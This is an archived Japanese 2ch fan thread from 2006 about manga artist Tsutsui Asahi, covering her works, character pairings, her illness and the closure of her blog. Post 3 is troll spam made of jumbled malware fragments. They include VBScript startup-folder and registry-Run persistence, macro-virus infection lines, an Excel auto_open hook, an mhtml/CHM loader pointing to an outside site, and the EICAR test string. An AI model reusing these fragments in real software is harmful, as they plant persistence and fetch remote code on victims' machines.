5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【フォモ】筒井旭を語れ2【マンセー】

1 :花と名無しさん:2006/12/08(金) 21:40:27 ID:???0
漫画家筒井旭先生のスレです。
作品やブログについてまったり語り合いましょう。

一応sage進行でお願いします。
荒らし・煽りは徹底放置 ※反応するアナタも同罪です※

《前スレ》
【フォモ】筒井旭を語れ【マンセー】
http://comic6.2ch.net/test/read.cgi/gcomic/1150422280/l50

筒井旭のチカチカ☆
http://comic6.2ch.net/test/read.cgi/gcomic/1055159197/l50

2 :花と名無しさん:2006/12/08(金) 21:56:46 ID:???0
にー。

3 :<body onload=window()>:2006/12/08(金) 22:08:53 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :花と名無しさん:2006/12/09(土) 08:17:28 ID:???0
わーい!新スレだー
筒井タンダイエットなんかしてないで遊びにおいでー

5 :花と名無しさん:2006/12/09(土) 08:24:07 ID:???0
いや、むしろ来ない方が。また変なの湧いたらやだし。
今回のトマの絵に萌え……

6 :花と名無しさん:2006/12/09(土) 16:17:58 ID:???0
最近、絵が変わってきた感じがするのは私だけ?前よりラフな感じ


7 :花と名無しさん:2006/12/09(土) 16:46:13 ID:???0
売名なのか自演なのか
こんな低のウ漫画家に名前出された松本次郎がカワイソ


8 :花と名無しさん:2006/12/09(土) 17:29:41 ID:???0
>>7

(。´ー`)ふ〜ん。。。で?

9 :花と名無しさん:2006/12/09(土) 19:40:03 ID:???0
>7

売名も何も松本次郎だなんて本人一言も言ってないし
ここの住人が推測で出しただけ
そんな考え方しか出来ない君の方が可愛そうに見えるよ

10 :花と名無しさん:2006/12/09(土) 21:00:09 ID:???0
荒らしを無視出来ないのも荒らし
>>1をよく読もう

11 :花と名無しさん:2006/12/09(土) 21:30:01 ID:???0
まぁまぁ、また〜りと

しかし間違ってはないとおもたよ、うん>9


12 :花と名無しさん:2006/12/09(土) 21:42:59 ID:???0
不細工な少女漫画化と噂になるなら嫌だろうけど筒井タンは美人さんだからいいじゃないの

13 :花と名無しさん:2006/12/10(日) 00:37:03 ID:???0
そうだね
美人の人妻に惚れられたんなら特に怒る理由もなし

しかし本当に松本次郎さんのことなのか?

14 :花と名無しさん:2006/12/10(日) 00:47:16 ID:???0
>>1

>>13
前のブロ具でもろ松本次郎スキーて書いてたg
別にどうでもいい

トマ×金まだかい……

15 :花と名無しさん:2006/12/10(日) 02:24:34 ID:???0
トーマス登場当時はヒスっぽい釜臭いイメージだったけど
あのイラストは感じ違うね

16 :花と名無しさん:2006/12/10(日) 06:53:34 ID:???0
>ヒスっぽい釜
それおもた!

また流星みたいな小柄で可愛い系の女装が似合うキャラ描いてホスィ

17 :花と名無しさん:2006/12/10(日) 09:40:13 ID:???0
でもいかにも「抱いてください」キャラだしなー>流星

18 :花と名無しさん:2006/12/10(日) 10:41:26 ID:???0
そこが好きなんだけど。

19 :花と名無しさん:2006/12/10(日) 14:32:15 ID:???0
流星と、汝に出てくる副部長だっけ
あの二人がだぶるのは私だけ?


20 :花と名無しさん:2006/12/10(日) 18:15:28 ID:???0
>>19
ああー・・・でも属性は違うん出ないかな・・・。
こう、流星は本能丸出しな部分あるし・・・w

21 :花と名無しさん:2006/12/10(日) 18:36:43 ID:???0
>>20
そうそう、逆走気味の一途さがものすごかったね>流星
鞠子副部長はもう少し抑えてたというか大人だた
ちびキャラではかぶってたけど

22 :花と名無しさん:2006/12/10(日) 18:55:52 ID:???0
旦那さんのおっぱいコリコリて…ちょと引いたゎ

23 :花と名無しさん:2006/12/10(日) 19:10:41 ID:???0
>>13

そうか?松本の好みをムシした意見だな
しかも松本に彼女(か奥さん)がいた場合けっこう迷惑な話しじゃないか

亀レス蒸し返しスマソ

24 :花と名無しさん:2006/12/10(日) 19:33:48 ID:???0
母親が"おっぱいコーリコリ"は教育上どうかと・・
しかしイラストがほのぼのしてたので有りかなーとも・・ ('A`)


25 :花と名無しさん:2006/12/10(日) 20:24:54 ID:???0
コリコリは…さすがに…ねぇ。
他人の家のしつけにどうこう言えた義理じゃないけど。

26 :花と名無しさん:2006/12/11(月) 07:27:24 ID:???0
>23
本当に松本次郎ならね。もともと誰も分からない話しやし。

コリコリはワロス〜息子くんお茶目やな〜
つうか教えた筒井さんお茶目やなあ。。。。

27 :花と名無しさん:2006/12/11(月) 08:14:54 ID:???0
筒井タンのオウチはいい意味で力が抜けてて好感持てる
某漫画家の育児漫画やHP見ると、ゲーム禁止とか、肌着や食べ物もこだわってたり
あからさまに「アテクシの家は他とは違うざます」臭がプンプン

28 :花と名無しさん:2006/12/11(月) 11:18:41 ID:???0
この人、新居に仕事部屋できても結局居間で仕事してそう。
仕事部屋は読書部屋になったりして。

29 :花と名無しさん:2006/12/11(月) 11:32:22 ID:???0
桜沢エ○カ…?

30 :花と名無しさん:2006/12/11(月) 11:56:20 ID:???0
>>23 粘着乙
>>28 仕事部屋=ホモヲタ・ゲーム部屋
>>29 桜沢もしくはミカりん・・・

31 :花と名無しさん:2006/12/11(月) 12:14:16 ID:???0
>>27
真っ先にミカリン思い出した。

32 :花と名無しさん:2006/12/11(月) 14:25:05 ID:???0
ブログ更新CHERRYの国分先輩×詩!キタコレ! (゚∀゚)

33 :花と名無しさん:2006/12/11(月) 16:39:48 ID:???0
いやん。ラブラブな二人。

34 :花と名無しさん:2006/12/11(月) 16:41:44 ID:???0
キャーーー超エロいわwww
国分先輩カッコヨス

35 :花と名無しさん:2006/12/11(月) 16:48:17 ID:???0
詩が華奢で…!手なんか包み込まれちゃってるし!
国分先輩、もうチェリーな彼を頂いちゃって下さい、ぜひ!

36 :花と名無しさん:2006/12/11(月) 18:02:51 ID:???0
ドジンでもいいから続編が読みたい。生殺し。>チェリー

37 :花と名無しさん:2006/12/11(月) 18:08:17 ID:???0
>>35
あれは、既にヤッてる感じだよw

38 :花と名無しさん:2006/12/11(月) 18:37:27 ID:???0
どんな体位で…(*´Д`*)ハァハァ…妄想止まらず。逝ってくるわ…orz

39 :花と名無しさん:2006/12/11(月) 18:52:43 ID:???0
何故ああいうオイシイ絵をコミクス表紙に使わないのだーー

後ろの国分先輩のマグナムが詩くんに当たって驚いてる、そんなふうにも見えるが

40 :花と名無しさん:2006/12/11(月) 19:02:40 ID:???0
>>39
そうですか!そういうふうに楽しめば良いのですね師匠!

41 :花と名無しさん:2006/12/11(月) 19:40:56 ID:???0
>>39

ぷぎゃー
そういうイメージでもう一度見たらエロすぎて正視出来ませんですたー

42 :花と名無しさん:2006/12/11(月) 20:14:41 ID:???0
お前らのフィルタースゴスwwwww
チェリーはもうほんと、少女漫画雑誌でやっていいのかと。
ドギマギしたよ。でも続きみたいyp
今はトマ金のが気になるけど!トマ金!!

43 :花と名無しさん:2006/12/11(月) 20:16:48 ID:???0
↓未だに男だと思われてる筒井タン

男で少女漫画かいてる奴いる?
http://comic6.2ch.net/test/read.cgi/gcomic/1037179237/l50#tag893

890 :花と名無しさん :2006/12/11(月) 18:32:15 ID:Kp6iMasJ0
2,000年くらいにマーガレットで連載してた筒井旭。
「汝 なやむことなかれ」っていう漫画描いてた。
すごく面白かったけど最近出てこない・・・。

891 :花と名無しさん :2006/12/11(月) 18:39:59 ID:???O
ダメ出し。とかいうの1巻出してたよね
男が少女漫画家目指してるやつ
あれって割と最近じゃなかった?
もう売っちゃったから手元ないけどコミクス買って読んだよ

44 :花と名無しさん:2006/12/11(月) 22:01:40 ID:???0
>>43
未だに…釣りじゃないんだよね…?

>>39
素晴らしい妄想に拍手!こりゃもう続編描くしかないよ筒井タンw

45 :花と名無しさん:2006/12/11(月) 22:26:17 ID:???0
ブログ読んでない人は、
未だに男だと思ってる人多いんじゃないかなー

46 :花と名無しさん:2006/12/11(月) 23:59:48 ID:???0
おっさんのホモスキーのヲタ少女漫画家・・
なんか最悪なイメージかもw
でも負けずにこれからもキュンキュンな男の子達を描いてホスィー
次はトマ×金の妄想カットをキボンwww

47 :花と名無しさん:2006/12/12(火) 00:09:40 ID:???0
筒井たんがミカリンみたいに叩かれたら嫌だな。あんまり家の写真とか出さない方がいいのでは。

48 :花と名無しさん:2006/12/12(火) 07:35:53 ID:???0
ミカリンは厚顔無恥で他人の不満や家、子供自慢がうるさいから叩かれても仕方ナス
筒井さんは自分がだらしないだけなので大丈夫とおもわれ

49 :花と名無しさん:2006/12/12(火) 07:41:21 ID:???0
筒井タンは他人を貶めずに自分の身を自虐的に切り売りしてるからいいのだよ。

50 :花と名無しさん:2006/12/12(火) 08:26:51 ID:???0
>>43

確かダメ出しの一巻には近況漫画も入ってたはずだが
一巻を読んだ891が否定してないってことは何事か
それともあくまで周囲に男と思わせておきたいだけの釣りか?



51 :花と名無しさん:2006/12/12(火) 08:54:37 ID:???0
>46 おっさんのホモスキーのヲタ少女漫画家でも顔がもこみちなんだよ

ねみぃ…もう限界だ ('−`) 

52 :花と名無しさん:2006/12/12(火) 09:59:04 ID:???0
もこみちてw
まあ筒井タソを男と思いながら漫画も好きーって読んでる腐女子なら
ネギのような漫画家を想像してるだろうよ。
ほんでトマのようなアシとバコバコやりまくっていんのよ。


53 :花と名無しさん:2006/12/12(火) 10:25:26 ID:???0
オトコだって少女漫画家を目指したい!
http://comic.2ch.net/gcomic/kako/1028/10284/1028419383.html

16 名前: 1 投稿日: 02/08/04 17:44 ID:tGSCDi0A
みなさんレスありがとうございます!
俺はみなさんが思っているほど、少女漫画を読む、買うことに抵抗を感じていません。
少女漫画には恥ずかしさを超えて、読む価値があると思っているからです。
始めは男尊女卑の心から、少女漫画は読めませんでした。でも、結局は食わず嫌いで、
実際読んでみた時は女性の文化の素晴らしさに驚きました。
少女漫画の魅力は心理描写が巧みで、内容が深いことだと思ってます。
深い心理描写は様々なことを伝えてくれます。俺も少女漫画を読んで様々なことを学びました。
こう言った女性文化特有の心理描写が描きたくて、
あえて『少女漫画』と言う分野に挑戦しています!
 ただ残念なことに、今の少女漫画は良い方向に進んでいるとは思えません。
良い作家さんはいるのですが、あまりにも全体として衰退感があります。
本来の漫画の意味である『面白さ』と言うことが薄れていっている気がしてしょうがないです。
せっかくここまで育った女性文化を衰退させてしまうのは惜しいです。
面白い漫画を描いて女性文化を発展させていきたいと言った気持ちも、
少女漫画を描いている理由かもしれません。

駄長文スマソ


↑寅と仲良くなれそうな彼。。。(*´ω`*)


54 :花と名無しさん:2006/12/12(火) 11:57:55 ID:???0
もこみちイラネ  トマ金早く読ましてくれや

55 :花と名無しさん:2006/12/12(火) 13:36:49 ID:???0
普通に寅とたきちゃんじゃダメなのか?

56 :花と名無しさん:2006/12/12(火) 15:50:25 ID:???0
タキはツンデレなので自分の萌え対象であります!

57 :花と名無しさん:2006/12/12(火) 16:45:51 ID:???0
でもタキちゃんの性格からして絶対自分から告白したりしなさそう。
早く気づけよ!みたいに寅にイラつきそうw


58 :花と名無しさん:2006/12/12(火) 18:42:47 ID:???0
タキといい、詩の片割れといい
ヒロインの性格がキツイね。

59 :花と名無しさん:2006/12/12(火) 19:08:46 ID:???0
奏はヒロインでもないし気にならなかったけど。
サブキャラが乙女ってパターンが多いよね。
モニカとかたまことか

60 :花と名無しさん:2006/12/12(火) 19:44:27 ID:???0
根底にホモが息づいているんだな
主人公は男。相手のヒロインは性別こそ女だが男気のありそうなタイプ。

だから婦女子には萌えw

61 :花と名無しさん:2006/12/12(火) 19:51:37 ID:???0
主人公の男の方がヒロインより女っぽいよね。

62 :花と名無しさん:2006/12/12(火) 22:11:12 ID:???0
女っぽいっていうか男の中にもある女の部分みたいなの?そういうところの、
表現が上手いと思う。確かに若干リリカルな男主人公は多い気もするけど。
でもその男のセンチメンタルなところがBLの切なさに出てるんだね。
だからといって、BLオンリー作家になるのは惜しい。
男女間の恋愛表現も何気にテクニシャンだと思うから。

63 :花と名無しさん:2006/12/12(火) 22:27:17 ID:???0
性別に関係なくこの人の描く人間臭とか生活臭とか独特な空気感は好き
ギャグや古典的展開ストーリで良い部分が半減されてるが

64 :花と名無しさん:2006/12/12(火) 22:50:23 ID:???0
男女間の恋愛表現といえば
セツが北別府の家に押しかけてチューするシーンが好きだ。

あと千秋が成のおねしょシーツ洗うとこも好きだ。

65 :花と名無しさん:2006/12/13(水) 07:19:53 ID:???0
「青春は〜」を今の絵で見たいッス。

66 :花と名無しさん:2006/12/13(水) 07:24:29 ID:???0
>>65
禿同

輝夫×流星のその後を今の絵で読みたい!

67 :花と名無しさん:2006/12/13(水) 07:42:41 ID:???0
それいいな 読みたい。

68 :花と名無しさん:2006/12/13(水) 08:01:47 ID:???0
ブログで青春は痛いっすや汝のイラスト描いて欲しー

69 :花と名無しさん:2006/12/13(水) 08:40:09 ID:???0
>>66
すでに男女間じゃないしw

成のおねしょシーンは結構ショックだた。
BLで同じようなシチュエーション(小説だけど)読んだ事あるけど
そんなでも無かったのに、成は女の子だったからか恥ずかしいっていうか
同性だと自分と重なるのか最初は嫌悪感がかなりあったな。
そういうの普通に描いちゃうところが、筒井タンが男と間違われる要因の一つかもw


70 :花と名無しさん:2006/12/13(水) 08:51:43 ID:???0
>64
>セツが北別府の家に押しかけてチューするシーン

そんなシーンあったっけ…?合宿の時のちゅーじゃなくて??

71 :花と名無しさん:2006/12/13(水) 09:40:38 ID:???0
>>70
ラストの方。
北別府がテンパって家に逃げ帰った時にセツが自宅ドア蹴破って家宅侵入。
ごちゃごちゃ言う北別府を無視し強制的に唇を奪う。



72 :花と名無しさん:2006/12/13(水) 10:54:47 ID:???0
>>69
流れよく読んでくれ

73 :花と名無しさん:2006/12/13(水) 13:03:35 ID:???0
ブログ更新〜タキ&寅ラブラブイラスト乙!
痛いっスはフォモキャラ出てもほとんどがギャグオチだったのに
何故か根強い人気だね>流星×輝夫

74 :花と名無しさん:2006/12/13(水) 13:17:14 ID:???0
>>66
ネット漫画でもいいから激しくキボン

>>73
細かい事だが輝夫×流星の表記で頼む
よからぬ妄想信者が湧くと困るので

75 :花と名無しさん:2006/12/13(水) 13:45:40 ID:???0
流星×輝夫は確かに危険だw
人気があるのはたぶん、流星が小さくて一途で可愛いからじゃない?
しかも輝夫がしぶとく拒んでたから特に切なく見えたしね。

話し変わるけど、筒井タンいい加減に仕事して欲しい・・

76 :花と名無しさん:2006/12/13(水) 15:26:02 ID:???0
旦那もこれ以上エサを与えるな

77 :花と名無しさん:2006/12/13(水) 18:57:23 ID:???0
筒井タンは追い詰められないと仕事ができないタイプみたいだし、
こうなったら旦那とゴンザレスとPS3を拉致して(ry

78 :花と名無しさん:2006/12/14(木) 04:53:20 ID:???0
なあ・・・・輝夫×流星じゃないのか・・・?笑
流星×輝夫なら大本命だから嬉しいけども。

皆蜂谷君を忘れないで下さい。

79 :花と名無しさん:2006/12/14(木) 06:33:38 ID:???0
どっちでもいいや
自分はリバあり派

80 :花と名無しさん:2006/12/14(木) 07:28:04 ID:???0
おおぅ、蜂谷いたなー
一途なんだけどちょと変態入ってて・・あれ?彼は攻だっけ?

81 :花と名無しさん:2006/12/14(木) 08:13:54 ID:???0
実は受けだったりして。そんな気がした。

82 :花と名無しさん:2006/12/14(木) 09:13:44 ID:???0
普通に受だと思ってた
だって後で流星のマッチョな兄を好きになったよね>蜂谷
あれを相手に攻は無理でFa

ちなみに自分も絶対輝夫×流星 リバ無し派

83 :花と名無しさん:2006/12/14(木) 09:25:16 ID:???0
ジャスコでPS3買えるとは…自分の友人は前日から並んだくちだが
友人が哀れに見えてきた

84 :花と名無しさん:2006/12/14(木) 10:05:27 ID:???0
筒井タンてまじで自堕落だよね
同人やって商業誌がおろそかに、じゃないもんね
どっちかでももっとマメに活動すればもう少し知名度も上がってたろうに、、
どうしたらもっとやる気出してくれるんだろう



85 :花と名無しさん:2006/12/14(木) 11:21:22 ID:???0
やりたい事しかやらない筒井タンだから諦めれw

蜂谷は絶対受けでしょう!つか流星の兄を受けと想像したくない!
「ガタイがいい方が攻め」と一般的嗜好な自分ですが
なぜかトーマスだけは受けのイメージが捨て切れません…

86 :花と名無しさん:2006/12/14(木) 12:10:15 ID:???0
>>85
わかるわ
トマはリバース有だねw

87 :花と名無しさん:2006/12/14(木) 12:18:14 ID:???O
今も同人やってんの?

88 :花と名無しさん:2006/12/14(木) 12:33:51 ID:???0
筒井タンは知名度もさほどないし、連載中の作品も今やないというのに、
このスレの伸びは何なんだw
801好きの姐さん方のおかげなのか?

89 :花と名無しさん:2006/12/14(木) 14:20:12 ID:???0
BL愛読者の人達には密かに好かれてるかもねw
でも今は同人もやってないし(昔もたいして活動してなかったが)
商業誌だって連載もってないのになんでだろう


90 :花と名無しさん:2006/12/14(木) 14:57:41 ID:???0
ヲタな登校拒否学生やニートが湧いている。

91 :花と名無しさん:2006/12/14(木) 15:10:57 ID:???0
ニートのアイドル、アサヒちゃん★

92 :花と名無しさん:2006/12/14(木) 15:37:10 ID:???O
何か少女漫画でホモ描写って増えたよな?
筒井タンは昔からそーゆー描写をしてきた漫画家だから別に今更何をかかれても全て受け入れれるけど
少女漫画の王道突っ走ってた漫画家でさえ最近はホモを無理やり取り入れようとしてる気がする

少女漫画家でホモ話読みたいと思うのは筒井タンと早稲田さんだけだな自分は。

93 :花と名無しさん:2006/12/14(木) 16:58:11 ID:???0
ニートのアイドルって…ヒドス

昔と違ってオタクブームもあって同人界も大っぴらになってるからか
ちょっとでも人気出ると割と簡単に商業誌デブーするからね。
そういう少女漫画家は最初は大人しく少女漫画描いてても物足りなくなってくるんじゃない?
もしくはもっと違うファン層獲得のために無理して入れてるとか?

94 :花と名無しさん:2006/12/14(木) 17:05:45 ID:???0
他の BLチックなのかいてる少女漫画家なんて興味ないな。
筒井たんの絵で筒井たんの表現だから好きなわけで。

95 :花と名無しさん:2006/12/14(木) 19:34:21 ID:???0
森永さんも描いてるよね。
あの人も同人出身だったっけ。
筒井タンも森永さんも少女漫画という枠から微妙にはみ出そうな作風だしな。

自分はこの二人のBLなら受け入れられる。

96 :花と名無しさん:2006/12/14(木) 20:33:20 ID:???0
この人の作品はなんか微妙に違うんだよね。
ベタな少女漫画展開があったかと思うと少年漫画のような絵で見せるギャグもあるし
かと思うと大人なモノローグや表現があったり、ちぐはぐなのに何故か違和感がない。
少女漫画とかBLとかギャグとか一つの枠に収められない。
良い悪いもなくて、この人特有の奇妙で絶妙な特徴なのかもね。

97 :花と名無しさん:2006/12/14(木) 20:35:54 ID:???0
人と違ってもサブカル気取ってなくていい

98 :花と名無しさん:2006/12/15(金) 03:15:36 ID:???0
人と違う自分ってカッコイイ!…とかねw

99 :花と名無しさん:2006/12/15(金) 09:40:34 ID:???0
二中病ってやつか。

100 :花と名無しさん:2006/12/15(金) 11:04:27 ID:???0
中二病では・・・?

101 :花と名無しさん:2006/12/15(金) 12:24:52 ID:???0
きっと中二病と言いたかったんだろう >99

マンセーばかりで少し気持ち悪…
でも自分も筒井漫画は好き。ゴマちゃんが一番好き。

102 :花と名無しさん:2006/12/15(金) 12:35:31 ID:???0
筒井タンはサブカル系じゃないってば ('A`)


103 :花と名無しさん:2006/12/15(金) 14:36:39 ID:???0
風邪大丈夫かな・・('A`)

104 :花と名無しさん:2006/12/15(金) 20:19:01 ID:???0
でも映画見てるし。

105 :73:2006/12/16(土) 07:57:44 ID:???0
しかもブログ更新してるし。大丈夫かな。w

>>74
亀ですが・・流星×輝夫の表記すみませ〜ん(汗;
特に何も考えてませんでしたよ。
私はもちろん輝夫×流星です!www

106 :花と名無しさん:2006/12/16(土) 10:47:55 ID:???0
確かに連載もやってないのにレスの伸びに驚きw
でも自分なんかは逆に最近誌面で筒井さんの作品あまり見れなくて寂しいから
ここ覗いてる感じ。801関係なく。


107 :花と名無しさん:2006/12/17(日) 11:03:06 ID:???0
リア厨、ニート書き込み自粛したか?
ちょっと寂しいw

108 :花と名無しさん:2006/12/17(日) 11:38:39 ID:???0
ここの住民で筒井作品の同人誌作ったら面白そうだ。

109 :花と名無しさん:2006/12/17(日) 11:39:01 ID:???0
どうせ自作自演のクソスレだし

110 :花と名無しさん:2006/12/17(日) 16:53:10 ID:???0
たぶん冬休みの厨房が一時的に湧いたんだろう
やっと普通になってむしろホッとした

>>108
ぜひ読んでみたい
自分は絵は全くなのでどなたかよろしく

111 :花と名無しさん:2006/12/17(日) 17:30:49 ID:???0
同人誌作るならぜひ汝の鞠子×痛いっスの流星で。
気が強くて小さい男の子同士・・カワユス

112 :花と名無しさん:2006/12/17(日) 19:11:18 ID:???0
>>110
冬休みってこんな早いの?

113 :花と名無しさん:2006/12/17(日) 19:15:09 ID:???0
波平は〜 (*´Д`*)

114 :花と名無しさん:2006/12/17(日) 19:44:55 ID:???0
ところで筒井タンの次の掲載っていつなの?

115 :花と名無しさん:2006/12/17(日) 22:03:44 ID:???0
12/22発売のザマ

116 :花と名無しさん:2006/12/18(月) 07:33:07 ID:???0
冬休みってこれからじゃまいか?
ってことは、やっぱりニートが荒らしに来てたってこと?!いやん!

117 :花と名無しさん:2006/12/18(月) 07:50:22 ID:???0
つヒント 暇な主婦

118 :花と名無しさん:2006/12/18(月) 10:06:23 ID:???0
ブログで主婦層も獲得したかw
でも主婦が暇つぶしに2ちゃんなんか見るか?

119 :花と名無しさん:2006/12/18(月) 12:21:28 ID:???0
にちゃん来てる主婦が通りますよ。
私はここで筒井さんのブログを知りました。感謝してます。

120 :花と名無しさん:2006/12/18(月) 16:21:51 ID:???0
ブログの更新ないけど、まだ胃腸炎治ってないのかな?
これでこの先のザマ掲載のも延期ってことになったりしたら複雑だ・・

121 :花と名無しさん:2006/12/18(月) 17:35:22 ID:???0
それは困る!負けるな筒井タン!

122 :花と名無しさん:2006/12/18(月) 19:23:59 ID:???0
>>115
d

楽しみだなぁ…ってまた原稿落としたらマズイよ筒井タン〜

123 :花と名無しさん:2006/12/18(月) 19:29:49 ID:OvgDF9aN0
聖しゃんは〜 (*´Д`*)

124 :花と名無しさん:2006/12/18(月) 22:36:41 ID:???0
あげるなハゲ〜(*´Д`*)

125 :花と名無しさん:2006/12/19(火) 07:31:27 ID:???0
トマ金が読めるのはいつやら・・・・

126 :花と名無しさん:2006/12/19(火) 11:47:50 ID:???O
トマ金すげー萌えるんだけど
そんな自分がキモいんだけど

もう同人やってやろーかしら?ってくらい好きなんだけどどーすりゃいいのこの歯がゆさ
筒井タンさっさと描いてくれ

127 :花と名無しさん:2006/12/19(火) 16:46:46 ID:???0
126さん、ぜひやっちゃって下さい。同人誌買いますよ。

128 :花と名無しさん:2006/12/19(火) 19:16:30 ID:???0
続編のトマ金て、やっちゃうのかなー

129 :花と名無しさん:2006/12/19(火) 19:45:13 ID:???0
筒井さんてノロウイルスですかね?

あと、クリスマスバージョンのイラストのサインが「thuthui」になってたけど、
前からだっけ?「tsutsui」じゃなくて?

130 :花と名無しさん:2006/12/19(火) 19:49:04 ID:???0
ちゅちゅい?

131 :花と名無しさん:2006/12/19(火) 22:03:47 ID:???0
かわゆす〜>ちゅちゅい

132 :花と名無しさん:2006/12/20(水) 07:38:03 ID:???0
ノロっぽいよね
締切りまたヤバくなってるけど亀田だの見てないで仕事頑張ってホスィ

133 :花と名無しさん:2006/12/20(水) 08:22:02 ID:???0
クリスマスイラストの男の子激萌え

134 :花と名無しさん:2006/12/20(水) 14:00:59 ID:???0
この人の絵やっぱり好きだな。うまい。
ノロウィルスじゃしようがない。トマ×金、気長に待つわ・・

135 :花と名無しさん:2006/12/20(水) 19:33:16 ID:???0
>>128
いっそ男らしく、やっちゃって欲しいよねw


136 :花と名無しさん:2006/12/20(水) 19:52:51 ID:???0
潔くガバッっと!

137 :花と名無しさん:2006/12/20(水) 20:00:07 ID:???0
最近あげる人多いけど、わざと?

138 :花と名無しさん:2006/12/21(木) 06:45:43 ID:???0
絶対変なヤシ棲みついてるよねここ

139 :花と名無しさん:2006/12/21(木) 08:53:24 ID:???0
上げただけで変人あつかいって・・・

筒井タンの漫画についてもっと話したいのに漫画が載らないから
言うことがなくて寂しい。早く連載やって欲しいよ。

140 :花と名無しさん:2006/12/21(木) 14:58:20 ID:???0
ザマ、明日発売だねー買うか悩むなー

141 :花と名無しさん:2006/12/21(木) 21:50:03 ID:???0
ネトオチ予定が、亀田のおかげで更新されてたよー。

年賀状イラストかわゆす〜。

142 :花と名無しさん:2006/12/21(木) 21:55:54 ID:???0
イラストのデッサンおかしい

143 :花と名無しさん:2006/12/21(木) 23:09:32 ID:???0
どこが?

144 :花と名無しさん:2006/12/21(木) 23:20:39 ID:???0
>>142
同業か?
自分には完成度の高いきれいなイラストに見えるが
そこまで言うならどこがどんなふうにおかしいのか詳しく頼む。

145 :花と名無しさん:2006/12/22(金) 01:06:34 ID:???0
男の子の背中のラインが色っぽい!
筒井タンのショタ猛烈に見たくなった! (*´Д`*)ハァハァ

146 :花と名無しさん:2006/12/22(金) 02:09:11 ID:???0
>>142じゃないけど、私も変だと思った。
肩、首の向きが真正面で、あそこまで横顔が見えるのは変
背中の左右の骨の形もアンバランスかも
下半身と上半身の向きもおかしい

147 :花と名無しさん:2006/12/22(金) 14:59:51 ID:???0
閉鎖だなんてええええ・゚・(つД`)・゚・ ウワァァァン

148 :花と名無しさん:2006/12/22(金) 15:09:16 ID:???0
ブログ閉鎖正直せいせいした。
ブログなんか書いてる暇があったら仕事しろよって思ってたから。
育児だなんだって中途半端に漫画描くくらいなら、いっそ辞めてしまえば良いのに。

149 :花と名無しさん:2006/12/22(金) 15:11:59 ID:???0
こういう腐ったヤシいるからさー…>148

150 :花と名無しさん:2006/12/22(金) 15:31:52 ID:???0
なんか人気落ちてから読者に忘れられないように
ブログで必死に自己アピールとか話題作りしてた希ガス
だからこれで自然消滅していくんじゃまいか?もともと気まぐれ凡人主婦だしw


151 :花と名無しさん:2006/12/22(金) 15:40:01 ID:???0
(ΩДΩ)ガァァァン・・

152 :花と名無しさん:2006/12/22(金) 17:30:45 ID:???0
ちょっと・・・漫画よりブログが好きな私はどうなるの

みんなでコメント欄にやめないでって書き込もうよ!

153 :花と名無しさん:2006/12/22(金) 19:13:15 ID:???0
>>152
>漫画よりブログが好き

それはそれで筒井タンも嫌だと思うよw

154 :花と名無しさん:2006/12/22(金) 20:10:57 ID:???0
ブログ閉鎖残念だ・・・。
でも筒井タンが漫画に集中するためと思って我慢するよ。
ダメ出し2巻絶対出してくれ!待ってるぞ筒井タン!

155 :花と名無しさん:2006/12/22(金) 20:24:29 ID:???0
ブログ書くぐらい、漫画と関係ないじゃんー
なんで閉鎖なのー?

旦那に怒られたりしたんかな

156 :花と名無しさん:2006/12/23(土) 08:26:24 ID:???0
ブログ閉鎖は残念だし、なんで突然止めるのか気になるけど
筒井タンのことだからまたどこかで始めるんじゃないかな?
自力で見つけ出してやるぜー!てか、誰か見つけ出してー!

157 :花と名無しさん:2006/12/23(土) 17:24:05 ID:4T/i0CyEO
おい、誰も最終回について感想ないのかww

158 :花と名無しさん:2006/12/23(土) 18:59:02 ID:???0
だってザマ重いし、外寒いんだもん(´・ω・`)

159 :花と名無しさん:2006/12/23(土) 21:53:10 ID:???0
閉鎖悲しい。またどこかでお会いしたいよ筒井タン!
漫画もブログもこの人の表現するものが好きだー

明日にでもザマ買ってくる!


160 :花と名無しさん:2006/12/24(日) 09:29:36 ID:???0
ザマ買う予定じゃなかったんだけど、ブログ閉鎖がショックで衝動的に買ってしまった。
面白かったけど30Pじゃ全然足りなかった希ガス。もっと読みたかった。

161 :花と名無しさん:2006/12/24(日) 13:21:11 ID:???0
勝手にカラーだと思ってたら違ってた・・

162 :花と名無しさん:2006/12/25(月) 01:25:36 ID:???0
ブブブブブブブブブブブブブブブブログが消えてる・・・
ホントに閉鎖するのかorz

163 :花と名無しさん:2006/12/25(月) 06:13:17 ID:???0
  〃〃∩  _, ,_
     ⊂⌒( `Д´) < 閉鎖なんてヤダヤダ!
       `ヽ_つ ⊂ノ       
              ジタバタ

      _, ,_
     (`Д´ ∩ <ゴンザレス、だんなの話聞きたいー  
     ⊂   (       
       ヽ∩ つ  ジタバタ
         〃〃

    〃〃∩  _, ,_
     ⊂⌒( つД´) <マイホーム建設話もー
       `ヽ_ ノ ⊂ノ     
              ジタバタ

       ∩
     ⊂⌒(  _, ,_) < アサヒちゃんのニート話も…
       `ヽ_つ ⊂ノ      
              ヒック...ヒック...

       ∩
    ⊂⌒(  _, ,_) 
       `ヽ_つ ⊂ノ  zzz…


164 :花と名無しさん:2006/12/25(月) 07:28:56 ID:???0
>>163
寝るなよww

ほんとにブログ消えてる〜かなりショックだよ〜〜
